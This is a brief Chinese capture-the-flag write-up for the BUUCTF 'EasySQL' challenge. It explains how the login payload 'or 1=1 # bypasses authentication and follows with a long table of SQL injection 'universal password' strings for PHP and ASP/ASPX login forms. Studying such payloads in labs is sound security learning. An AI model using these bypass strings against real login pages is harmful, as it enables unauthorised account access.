BUUCTF: [极客大挑战 2019]EasySQL 1
BUUCTF: [极客大挑战 2019]EasySQL 1
记录 sql 注入题
账号 'or 1=1 #
密码任意
(这个很好用!)
一般的验证语句为
select * from table_name where username=‘admin’ or 1=1#’ and passwords =‘‘ssss’’
账号中的’使前面的引号闭合,or 1=1 使语句恒成立,最后的#号会注释掉#之后的语句,避免报错,所以sql语句返回真值,成功绕过验证,得到flag
学习内容:
| php | PHP万能密码 |
| 'or 1=1/* | |
| "or “a”="a | |
| "or 1=1– | |
| “or”=" | |
| “or”="a’='a | |
| "or1=1– | |
| “or=or” | |
| '‘or’=‘or’ | |
| ') or (‘a’='a | |
| ‘.).or.(’.a.’=’.a | |
| 'or 1=1 | |
| 'or 1=1– | |
| 'or 1=1/* | |
| ‘or"="a’='a | |
| ‘or’ ‘1’=‘1’ | |
| ‘or’’=’ | |
| ‘or’’=’‘or’’=’ | |
| ‘or’=‘1’ | |
| ‘or’=‘or’ | |
| 'or.‘a.’='a | |
| 'or1=1– | |
| 1’or’1’='1 | |
| a’or’ 1=1– | |
| a’or’1=1– | |
| or ‘a’=‘a’ | |
| or 1=1– | |
| or1=1– |
| asp | aspx万能密码 |
| "or “a”="a | |
| ‘.).or.(’.a.’=’.a | |
| or 1=1– | |
| 'or 1=1– | |
| a’or’ 1=1– | |
| "or 1=1– | |
| 'or.‘a.’='a | |
| “or”="a’='a | |
| ‘or’’=’ | |
| ‘or’=‘or’ | |
| admin’or 1=1# |
本文只为记录学习 如有侵权请联系作者删除

浙公网安备 33010602011771号